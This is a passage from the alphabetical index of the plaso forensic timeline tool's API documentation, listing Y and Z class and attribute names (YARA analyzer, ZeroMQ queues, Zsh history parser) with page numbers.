yaml_tag (plaso.analysis.windows_services.WindowsService attribute), 53
YAMLFilterFile (class in plaso.engine.yaml_filter_file), 148
YAMLFormattersFile (class in plaso.formatters.yaml_formatters_file), 177
yara_match (plaso.containers.events.EventDataStream attribute), 105
yara_rules_string (plaso.engine.configurations.ExtractionConfiguration attribute), 124
YaraAnalyzer (class in plaso.analyzers.yara_analyzer), 61
YaraRulesArgumentsHelper (class in plaso.cli.helpers.yara_rules), 81
year (plaso.engine.knowledge_base.KnowledgeBase property), 134
year (plaso.parsers.mediator.ParserMediator property), 400

Z

ZeitgeistActivityDatabasePlugin (class in plaso.parsers.sqlite_plugins.zeitgeist), 314
ZeitgeistActivityEventData (class in plaso.parsers.sqlite_plugins.zeitgeist), 315
ZeroMQBufferedQueue (class in plaso.engine.zeromq_queue), 149
ZeroMQBufferedReplyBindQueue (class in plaso.engine.zeromq_queue), 149
ZeroMQBufferedReplyQueue (class in plaso.engine.zeromq_queue), 149
ZeroMQPullConnectQueue (class in plaso.engine.zeromq_queue), 150


ZeroMQPullQueue (class in plaso.engine.zeromq_queue), 150
ZeroMQPushBindQueue (class in plaso.engine.zeromq_queue), 151
ZeroMQPushQueue (class in plaso.engine.zeromq_queue), 151
ZeroMQQueue (class in plaso.engine.zeromq_queue), 152
ZeroMQRequestConnectQueue (class in plaso.engine.zeromq_queue), 153
ZeroMQRequestQueue (class in plaso.engine.zeromq_queue), 153
ZshExtendedHistoryParser (class in plaso.parsers.zsh_extended_history), 468
ZshHistoryEventData (class in plaso.parsers.zsh_extended_history), 469
